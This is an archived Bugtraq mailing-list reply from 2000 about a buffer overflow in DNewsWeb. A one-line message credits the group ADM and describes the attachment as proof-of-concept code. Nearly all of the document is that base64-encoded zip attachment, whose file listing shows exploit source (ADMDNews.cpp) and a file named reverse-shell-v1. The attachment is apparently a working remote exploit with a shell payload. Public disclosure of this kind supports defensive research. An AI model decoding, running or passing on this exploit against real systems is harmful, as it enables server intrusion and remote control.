[14815] in bugtraq
Re: Alert: DNewsWeb buffer overflow
daemon@ATHENA.MIT.EDU (Nishad Herath)
Sat May 6 19:03:32 2000
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_4d1cb3aa_5c2708aa$4d65f2e"
Message-Id: <20000506081050.72101.qmail@hotmail.com>
Date: Sat, 6 May 2000 01:10:50 PDT
Reply-To: Nishad Herath <youcan_reachme@HOTMAIL.COM>
From: Nishad Herath <youcan_reachme@HOTMAIL.COM>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_4d1cb3aa_5c2708aa$4d65f2e
Content-Type: text/plain; format=flowed
This vulnerability was noticed some time ago by plaguez and the attached
code was written as "proof-of-concept".
greetz #!ADM
________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com
------=_NextPart_000_4d1cb3aa_5c2708aa$4d65f2e
Content-Type: application/x-zip-compressed; name="ADMDNews.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="ADMDNews.zip"
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
------=_NextPart_000_4d1cb3aa_5c2708aa$4d65f2e--
